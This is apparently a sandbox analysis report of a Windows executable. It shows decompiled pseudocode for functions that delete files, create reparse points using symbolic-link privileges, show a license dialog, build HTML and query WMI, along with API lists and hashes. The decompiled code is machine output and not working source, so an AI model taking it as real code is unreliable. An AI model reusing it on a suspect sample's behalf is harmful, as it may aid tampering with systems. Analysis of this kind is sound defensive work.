										__eflags = _t154 - 5;
										if(_t154 == 5) {
											L33:
											__eflags = E00C707BC();
											if(__eflags == 0) {
												E00C615C6(_t253 - 0x7c, 0x18);
												E00C715FE(_t253 - 0x7c);
											}
											L35:
											E00C66DCB(0xca1098, __eflags);
											E00C66D83(0xca1098, 9);
											_t250 =  *((intOrPtr*)(_t253 + 0x10));
											_push(_t200);
											__eflags =  *((char*)(_t250 + 0x10f1));
											if( *((char*)(_t250 + 0x10f1)) == 0) {
												DeleteFileW();
											} else {
												RemoveDirectoryW();
											}
											goto L38;
										}
										__eflags = _t154 - 0x522;
										if(__eflags != 0) {
											goto L35;
										}
										goto L33;
									}
									E00C66C23(_t200);
									E00C66D83(0xca1098, 9);
									goto L38;
								}
								__eflags = _t117 - 1;
								if(_t117 != 1) {
									goto L38;
								}
								goto L27;
							}
							_t234 =  *(_t253 - 0x2c);
							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
							 *_t234 = 0xa0000003;
							_t252 = _t229 + _t229;
							 *((short*)(_t234 + 0xa)) = _t252;
							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
							 *((intOrPtr*)(_t234 + 6)) = 0;
							E00C86066(_t234 + 0x10, _t253 - 0x107c);
							_t246 =  *(_t253 - 0x2c);
							 *((short*)(_t246 + 0xc)) = _t252 + 2;
							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
							E00C86066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
							goto L28;
						}
						E00C66C23(_t200);
						goto L38;
					}
				} else {
					if( *(_t253 - 0xd) != 0) {
						L38:
						_t201 = 0;
						L42:
						E00C615FB(_t253 - 0x2c);
						 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
						return _t201;
					}
					_t190 = E00C6BCC3(_t244 + 0x1104);
					_t269 = _t190;
					if(_t190 != 0) {
						goto L38;
					}
					_push(_t244 + 0x1104);
					_push(_t200);
					_push(_t244 + 0x28);
					_push(_t237);
					if(E00C67861(_t269) == 0) {
						goto L38;
					}
					goto L12;
				}
			}

0x00c66faa
0x00c66fb4
0x00c66fc0
0x00c66fc7
0x00c66fd1
0x00c66fd6
0x00c66fd6
0x00c66fe5
0x00c66fe8
0x00c66fed
0x00c66ff0
0x00c67007
0x00c6701a
0x00c6701d
0x00c67025
0x00c67031
0x00c67036
0x00c6703b
0x00c6703e
0x00c67043
0x00c67045
0x00c67045
0x00c6704d
0x00c67057
0x00c6705c
0x00c67061
0x00c67065
0x00c67066
0x00c6706d
0x00c67073
0x00c67073
0x00c67061
0x00c67078
0x00c67084
0x00c67089
0x00c6708f
0x00c67092
0x00c6709c
0x00c670d6
0x00c670e1
0x00c670ee
0x00c670f7
0x00c670fc
0x00c670ff
0x00c67108
0x00c67101
0x00c67101
0x00c67101
0x00c670ff
0x00c67114
0x00c671e1
0x00c671e3
0x00000000
0x00000000
0x00c671ea
0x00c671ef
0x00c671fb
0x00000000
0x00c67127
0x00c67139
0x00c67142
0x00c67155
0x00c6715b
0x00c6715b
0x00c67161
0x00c67164
0x00c67205
0x00c67208
0x00c67213
0x00c67216
0x00c67219
0x00c6721f
0x00c67222
0x00c67228
0x00c6722b
0x00c67239
0x00c6723f
0x00c6724d
0x00c67255
0x00c67258
0x00c6725f
0x00c67274
0x00c67280
0x00c67280
0x00c67283
0x00c67286
0x00c6729e
0x00c672a0
0x00c672a3
0x00c672de
0x00c672e0
0x00c6735d
0x00c67369
0x00c6736d
0x00c67372
0x00c67375
0x00c67386
0x00c67399
0x00c673ac
0x00c673b7
0x00c673c2
0x00c673c7
0x00c673ce
0x00c673d4
0x00c673d4
0x00c673df
0x00c673e1
0x00000000
0x00c673e1
0x00c672e3
0x00c672ee
0x00c672f3
0x00c672f9
0x00c672fc
0x00c67305
0x00c6730a
0x00c6730c
0x00c67313
0x00c6731b
0x00c6731b
0x00c67320
0x00c67327
0x00c67330
0x00c67335
0x00c67338
0x00c67339
0x00c67340
0x00c6734a
0x00c67342
0x00c67342
0x00c67342
0x00000000
0x00c67340
0x00c672fe
0x00c67303
0x00000000
0x00000000
0x00000000
0x00c67303
0x00c672ad
0x00c672b6
0x00000000
0x00c672b6
0x00c6720a
0x00c6720d
0x00000000
0x00000000
0x00000000
0x00c6720d
0x00c6716d
0x00c67170
0x00c67176
0x00c67179
0x00c6717f
0x00c67182
0x00c67190
0x00c67196
0x00c671a4
0x00c671ac
0x00c671af
0x00c671b6
0x00c671cb
0x00000000
0x00c671d0
0x00c6714a
0x00000000
0x00c6714a
0x00c6709e
0x00c670a2
0x00c67350
0x00c67350
0x00c673e6
0x00c673e9
0x00c673f6
0x00c673fe
0x00c673fe
0x00c670af
0x00c670b4
0x00c670b6
0x00000000
0x00000000
0x00c670c2
0x00c670c3
0x00c670c7
0x00c670c8
0x00c670d0
0x00000000
0x00000000
0x00000000
0x00c670d0

APIs

__EH_prolog.LIBCMT ref: 00C66FAA
_wcslen.LIBCMT ref: 00C67013
_wcslen.LIBCMT ref: 00C67084

Part of subcall function 00C67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C67AAB
Part of subcall function 00C67A9C: GetLastError.KERNEL32 ref: 00C67AF1
Part of subcall function 00C67A9C: CloseHandle.KERNEL32(?), ref: 00C67B00

Strings

UNC\, xrefs: 00C67051
SeRestorePrivilege, xrefs: 00C66FC2
SeCreateSymbolicLinkPrivilege, xrefs: 00C66FCC
\??\, xrefs: 00C6702B

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 04c6db604272bb6609905b6a2094f33ba66e3634a908d561ae2b7ba0f7c0d148
Instruction ID: ece9460c58016f4f291399e50810e15317ad6d6124b2728cbc7e9e6387ab536c
Opcode Fuzzy Hash: 04c6db604272bb6609905b6a2094f33ba66e3634a908d561ae2b7ba0f7c0d148
Instruction Fuzzy Hash: E04106B1D08384BAEF30A7709CC6FEE776C9F05308F044956FA59A6182D774AB449B25

Uniqueness

Uniqueness Score: -1.00%

Function 00C79711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126
memoryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00C79711(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				void* _t29;
				intOrPtr* _t36;
				void* _t43;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t68;
				long _t70;
				void* _t72;
				void* _t73;

				_t58 = __edx;
				_t42 = _t43;
				if( *((intOrPtr*)(_t43 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t72 + 8) =  *(_t72 + 8) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t72 + 0x18));
				 *((char*)(_t72 + 0x13)) = E00C795AA(_t60);
				_push(0x200 + E00C83E13(_t60) * 2);
				_t24 = E00C83E33(_t43);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E00C86066(_t64, L"<html>");
				E00C87686(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00C87686(_t64, L"utf-8\"></head>");
				_t73 = _t72 + 0x18;
				_t68 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E00C71FDD(_t77, _t68, L"<html>", 6);
					 *((char*)(_t73 + 0x12)) = _t29 == 0;
					if(_t29 == 0) {
						_t60 = _t68 + 0xc;
					}
					E00C87686(_t64, _t60);
					if( *((char*)(_t73 + 0x1a)) == 0) {
						E00C87686(_t64, L"</html>");
					}
					_t81 =  *((char*)(_t73 + 0x13));
					if( *((char*)(_t73 + 0x13)) == 0) {
						_push(_t64);
						_t64 = E00C79955(_t58, _t81);
					}
					_t70 = 9 + E00C83E13(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t70);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t70 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L00C83E2E(_t64);
					_t24 =  *0xcc3180(_t62, 1, _t73 + 0x14);
					if(_t24 >= 0) {
						E00C795EB( *((intOrPtr*)(_t42 + 0x10)));
						_t36 =  *((intOrPtr*)(_t73 + 0x10));
						 *0xc93278(_t36,  *((intOrPtr*)(_t73 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t36 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t68 = _t68 + 2;
					_t77 =  *_t68 - _t28;
				} while ( *_t68 == _t28);
				goto L4;
			}

0x00c79711
0x00c79714
0x00c7971a
0x00c7985f
0x00c7985f
0x00c79720
0x00c79727
0x00c79732
0x00c79742
0x00c79743
0x00c79748
0x00c7974e
0x00c7985a
0x00000000
0x00c7985b
0x00c7975b
0x00c79766
0x00c79771
0x00c79776
0x00c79779
0x00c7977d
0x00c79781
0x00c7978c
0x00c79794
0x00c7979b
0x00c797a2
0x00c797a4
0x00c797a4
0x00c797a9
0x00c797b5
0x00c797bd
0x00c797c3
0x00c797c4
0x00c797c9
0x00c797cb
0x00c797d3
0x00c797d3
0x00c797df
0x00c797eb
0x00c797ef
0x00c797f9
0x00c7980e
0x00c7981b
0x00c79810
0x00c79810
0x00c79815
0x00c79815
0x00c7980e
0x00c7981f
0x00c7982d
0x00c79836
0x00c79841
0x00c79846
0x00c79852
0x00c79858
0x00c79858
0x00000000
0x00000000
0x00000000
0x00000000
0x00c79783
0x00c79783
0x00c79783
0x00c79786
0x00c79786
0x00000000

APIs

_wcslen.LIBCMT ref: 00C79736
_wcslen.LIBCMT ref: 00C797D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00C797E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00C79806

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00C79760
<html>, xrefs: 00C79755, 00C7978E
utf-8"></head>, xrefs: 00C7976B
</html>, xrefs: 00C797B7

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: 500be434509d1ecd5425e3c0d6ed463a02bcc993df7cb4ac4856d69088b0aa92
Instruction ID: f747b29f675bdb2fc91974b908e12edcd8d01c688072aa163e9b8ec499e36c36
Opcode Fuzzy Hash: 500be434509d1ecd5425e3c0d6ed463a02bcc993df7cb4ac4856d69088b0aa92
Instruction Fuzzy Hash: 3E3146321083517BEB29BB649C0AF6F77ACEF42714F14411EF515961D2EB70DA0583AA

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00C7B5C0(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E00C61316(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E00C7D69E(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0xcb7b7c;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0xcbec84;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xcbfc9c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0xcc30c4(0xf));
					 *0xcc30c0(_t34);
					_t30 =  *0xca8444; // 0x0
					E00C79ED5(_t30, __eflags,  *0xca102c, _t37,  *0xcbfc98, 0, 0);
					L00C83E2E( *0xcbfc9c);
					L00C83E2E( *0xcbfc98);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t34, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00c7b5c0
0x00c7b5c1
0x00c7b5c7
0x00c7b5ce
0x00c7b5e7
0x00c7b6d3
0x00c7b6d5
0x00000000
0x00c7b6d5
0x00c7b5ed
0x00c7b5f3
0x00c7b620
0x00c7b625
0x00c7b62a
0x00c7b62c
0x00c7b637
0x00c7b637
0x00c7b63d
0x00c7b642
0x00c7b644
0x00c7b650
0x00c7b650
0x00c7b656
0x00c7b65b
0x00c7b65d
0x00c7b661
0x00c7b661
0x00c7b676
0x00c7b67e
0x00c7b694
0x00c7b69b
0x00c7b6a1
0x00c7b6b6
0x00c7b6c1
0x00c7b6cc
0x00000000
0x00c7b6d2
0x00c7b5f8
0x00c7b607
0x00000000
0x00c7b607
0x00c7b5fd
0x00c7b600
0x00c7b61b
0x00c7b60f
0x00c7b610
0x00000000
0x00c7b610
0x00c7b605
0x00c7b60e
0x00000000
0x00c7b60e
0x00000000

APIs

Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370

EndDialog.USER32(?,00000001), ref: 00C7B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 00C7B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00C7B650
SetWindowTextW.USER32(?,?), ref: 00C7B661
GetDlgItem.USER32(?,00000065), ref: 00C7B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00C7B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00C7B694

Strings

LICENSEDLG, xrefs: 00C7B5D4

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: d2923eb4ac31bc54cf340f7799791179ddeb30ad68bf90ad063d4bdaf1145582
Instruction ID: c1e7b60820769527246a50bbebf5d40d8ff0ac97a44c635f4c6c4a7bc2236662
Opcode Fuzzy Hash: d2923eb4ac31bc54cf340f7799791179ddeb30ad68bf90ad063d4bdaf1145582
Instruction Fuzzy Hash: 1A21D332204245BBD6255B66FD4AF7F3B7CEB4AB85F05C018F709921A0CB529E019635

Uniqueness

Uniqueness Score: -1.00%

Function 00C7FD10 Relevance: 13.7, APIs: 9, Instructions: 154
memoryCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00C7FD10(void* __ebx, char* __edx, char* _a4) {
				int _v8;
				signed int _v12;
				char _v20;
				short* _v28;
				signed int _v32;
				short* _v36;
				int _v40;
				int _v44;
				intOrPtr _v60;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				char _t33;
				int _t34;
				signed short _t36;
				signed short _t38;
				void* _t49;
				short* _t50;
				int _t52;
				int _t53;
				char* _t58;
				int _t59;
				void* _t60;
				char* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t69;
				intOrPtr _t70;
				int _t71;
				intOrPtr* _t72;
				void* _t74;
				short* _t75;
				void* _t78;
				signed int _t79;
				void* _t81;
				short* _t82;

				_t69 = __edx;
				_push(0xfffffffe);
				_push(0xc9c130);
				_push(E00C82900);
				_push( *[fs:0x0]);
				_t82 = _t81 - 0x18;
				_t30 =  *0xc9e7ac; // 0x2b9f4dac
				_v12 = _v12 ^ _t30;
				_t31 = _t30 ^ _t79;
				_v32 = _t31;
				_push(__ebx);
				_push(_t75);
				_push(_t71);
				_push(_t31);
				 *[fs:0x0] =  &_v20;
				_v28 = _t82;
				_t58 = _a4;
				if(_t58 != 0) {
					_t61 = _t58;
					_t69 =  &(_t61[1]);
					do {
						_t33 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t33 != 0);
					_t62 = _t61 - _t69;
					_t34 = _t62 + 1;
					_v44 = _t34;
					if(_t34 > 0x7fffffff) {
						L17:
						E00C7FCF0(0x80070057);
						goto L18;
					} else {
						_t71 = MultiByteToWideChar(0, 0, _t58, _t34, 0, 0);
						_v40 = _t71;
						if(_t71 == 0) {
							L18:
							_t36 = GetLastError();
							if(_t36 > 0) {
								_t36 = _t36 & 0x0000ffff | 0x80070000;
							}
							E00C7FCF0(_t36);
							goto L21;
						} else {
							_v8 = 0;
							_t49 = _t71 + _t71;
							if(_t71 >= 0x1000) {
								_push(_t49);
								_t50 = E00C83E33(_t62);
								_t82 =  &(_t82[2]);
								_t75 = _t50;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							} else {
								E00C92010(_t49);
								_v28 = _t82;
								_t75 = _t82;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							}
							if(_t75 == 0) {
								L16:
								E00C7FCF0(0x8007000e);
								goto L17;
							} else {
								_t52 = MultiByteToWideChar(0, 0, _t58, _v44, _t75, _t71);
								if(_t52 == 0) {
									L21:
									if(_t71 >= 0x1000) {
										L00C83E2E(_t75);
										_t82 =  &(_t82[2]);
									}
									_t38 = GetLastError();
									if(_t38 > 0) {
										_t38 = _t38 & 0x0000ffff | 0x80070000;
									}
									E00C7FCF0(_t38);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t79);
									_t70 = _v60;
									_push(_t71);
									_t72 = _t62;
									 *_t72 = 0xc956f8;
									 *((intOrPtr*)(_t72 + 4)) =  *((intOrPtr*)(_t70 + 4));
									_t63 =  *((intOrPtr*)(_t70 + 8));
									 *((intOrPtr*)(_t72 + 8)) = _t63;
									 *(_t72 + 0xc) = 0;
									if(_t63 != 0) {
										 *0xc93278(_t63, _t75);
										 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 4))))();
									}
									return _t72;
								} else {
									__imp__#2(_t75);
									_t59 = _t52;
									if(_t71 >= 0x1000) {
										L00C83E2E(_t75);
										_t82 =  &(_t82[2]);
									}
									if(_t59 == 0) {
										goto L16;
									} else {
										_t53 = _t59;
										goto L2;
									}
								}
							}
						}
					}
				} else {
					_t53 = 0;
					L2:
					 *[fs:0x0] = _v20;
					_pop(_t74);
					_pop(_t78);
					_pop(_t60);
					return E00C7FBBC(_t53, _t60, _v32 ^ _t79, _t69, _t74, _t78);
				}
			}

0x00c7fd10
0x00c7fd13
0x00c7fd15
0x00c7fd1a
0x00c7fd25
0x00c7fd26
0x00c7fd29
0x00c7fd2e
0x00c7fd31
0x00c7fd33
0x00c7fd36
0x00c7fd37
0x00c7fd38
0x00c7fd39
0x00c7fd3d
0x00c7fd43
0x00c7fd46
0x00c7fd4b
0x00c7fd70
0x00c7fd72
0x00c7fd75
0x00c7fd75
0x00c7fd77
0x00c7fd78
0x00c7fd7c
0x00c7fd7e
0x00c7fd81
0x00c7fd89
0x00c7fe4d
0x00c7fe52
0x00000000
0x00c7fd8f
0x00c7fd9f
0x00c7fda1
0x00c7fda6
0x00c7fe57
0x00c7fe57
0x00c7fe5f
0x00c7fe64
0x00c7fe64
0x00c7fe6a
0x00000000
0x00c7fdac
0x00c7fdac
0x00c7fdb3
0x00c7fdbc
0x00c7fdd4
0x00c7fdd5
0x00c7fdda
0x00c7fddd
0x00c7fddf
0x00c7fde2
0x00c7fdbe
0x00c7fdbe
0x00c7fdc3
0x00c7fdc6
0x00c7fdc8
0x00c7fdcb
0x00c7fdcb
0x00c7fe08
0x00c7fe43
0x00c7fe48
0x00000000
0x00c7fe0a
0x00c7fe14
0x00c7fe1c
0x00c7fe6f
0x00c7fe75
0x00c7fe78
0x00c7fe7d
0x00c7fe7d
0x00c7fe80
0x00c7fe88
0x00c7fe8d
0x00c7fe8d
0x00c7fe93
0x00c7fe98
0x00c7fe99
0x00c7fe9a
0x00c7fe9b
0x00c7fe9c
0x00c7fe9d
0x00c7fe9e
0x00c7fe9f
0x00c7fea0
0x00c7fea3
0x00c7fea6
0x00c7fea7
0x00c7fea9
0x00c7feb2
0x00c7feb5
0x00c7feb8
0x00c7febb
0x00c7fec4
0x00c7fecf
0x00c7fed5
0x00c7fed7
0x00c7fedc
0x00c7fe1e
0x00c7fe1f
0x00c7fe25
0x00c7fe2d
0x00c7fe30
0x00c7fe35
0x00c7fe35
0x00c7fe3a
0x00000000
0x00c7fe3c
0x00c7fe3c
0x00000000
0x00c7fe3c
0x00c7fe3a
0x00c7fe1c
0x00c7fe08
0x00c7fda6
0x00c7fd4d
0x00c7fd4d
0x00c7fd4f
0x00c7fd55
0x00c7fd5d
0x00c7fd5e
0x00c7fd5f
0x00c7fd6d
0x00c7fd6d

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,2B9F4DAC,00000001,00000000,00000000,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FE14
SysAllocString.OLEAUT32(00000000), ref: 00C7FE1F
_com_issue_error.COMSUPP ref: 00C7FE48
_com_issue_error.COMSUPP ref: 00C7FE52
GetLastError.KERNEL32(80070057,2B9F4DAC,00000001,00000000,00000000,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FE57
_com_issue_error.COMSUPP ref: 00C7FE6A
GetLastError.KERNEL32(00000000,?,?,00C6AF6C,ROOT\CIMV2), ref: 00C7FE80
_com_issue_error.COMSUPP ref: 00C7FE93

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 65471727ad38256040658dc256ca35b0435bac4735515a12c208af2c73b6541c
Instruction ID: 6f90c4ae2d840a3827db173794edd4430d037e2d639988066874d97edbed1c05
Opcode Fuzzy Hash: 65471727ad38256040658dc256ca35b0435bac4735515a12c208af2c73b6541c
Instruction Fuzzy Hash: B941F971A00259EBDB10DF65CC89BAEBBE8EF44710F10823EF919E7251D7349A01D7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C6AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00C6AF24() {
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;
				intOrPtr* _t67;
				signed char _t70;
				intOrPtr* _t72;
				signed char** _t75;
				signed char** _t76;
				signed char* _t77;
				intOrPtr* _t78;
				void* _t80;
				signed char _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				signed char _t92;
				signed char _t98;
				signed char _t105;
				signed char _t108;
				signed char* _t118;
				signed char _t119;
				signed char _t127;
				signed char _t139;
				void* _t147;
				void* _t149;
				void* _t155;
				void* _t162;

				E00C7EB78(0xc92919, _t162);
				_push(_t162 - 0x14);
				_push(0xc9574c);
				_t105 = 0;
				_push(1);
				_push(0);
				_push(0xc9581c);
				 *((intOrPtr*)(_t162 - 0x14)) = 0;
				if( *0xcc3188() >= 0) {
					_push(L"ROOT\\CIMV2");
					 *((intOrPtr*)(_t162 - 0x10)) = 0;
					_t63 =  *((intOrPtr*)(E00C6AE2D(_t162 - 0x20)));
					 *(_t162 - 4) = 0;
					if(_t63 == 0) {
						_t108 = 0;
					} else {
						_t108 =  *_t63;
					}
					_t64 =  *((intOrPtr*)(_t162 - 0x14));
					 *0xc93278(_t64, _t108, _t105, _t105, _t105, _t105, _t105, _t105, _t162 - 0x10, _t147);
					_t66 =  *((intOrPtr*)( *_t64 + 0xc))();
					 *(_t162 - 4) =  *(_t162 - 4) | 0xffffffff;
					_t149 = _t66;
					_t110 =  *(_t162 - 0x20);
					if( *(_t162 - 0x20) != 0) {
						E00C6AEF6(_t110);
					}
					if(_t149 < 0) {
						L21:
						_t67 =  *((intOrPtr*)(_t162 - 0x14));
						 *0xc93278(_t67);
						 *((intOrPtr*)( *((intOrPtr*)( *_t67 + 8))))();
						_t70 = 0;
					} else {
						_push(_t105);
						_push(_t105);
						_push(3);
						_push(3);
						_push(_t105);
						_push(_t105);
						_push(0xa);
						_push( *((intOrPtr*)(_t162 - 0x10)));
						if( *0xcc3184() < 0) {
							L20:
							_t72 =  *((intOrPtr*)(_t162 - 0x10));
							 *0xc93278(_t72);
							 *((intOrPtr*)( *((intOrPtr*)( *_t72 + 8))))();
							goto L21;
						} else {
							_push("SELECT * FROM Win32_OperatingSystem");
							 *(_t162 - 0x18) = _t105;
							_t75 = E00C6ADDB(_t162 - 0x28);
							_push("WQL");
							 *(_t162 - 4) = 1;
							_t76 = E00C6ADDB(_t162 - 0x20);
							_t118 =  *_t75;
							 *(_t162 - 4) = 2;
							if(_t118 == 0) {
								_t139 = _t105;
							} else {
								_t139 =  *_t118;
							}
							_t77 =  *_t76;
							if(_t77 == 0) {
								_t119 = _t105;
							} else {
								_t119 =  *_t77;
							}
							_t78 =  *((intOrPtr*)(_t162 - 0x10));
							 *0xc93278(_t78, _t119, _t139, 0x30, _t105, _t162 - 0x18);
							_t80 =  *((intOrPtr*)( *_t78 + 0x50))();
							_t121 =  *(_t162 - 0x20);
							_t155 = _t80;
							if( *(_t162 - 0x20) != 0) {
								E00C6AEF6(_t121);
								 *(_t162 - 0x20) = _t105;
							}
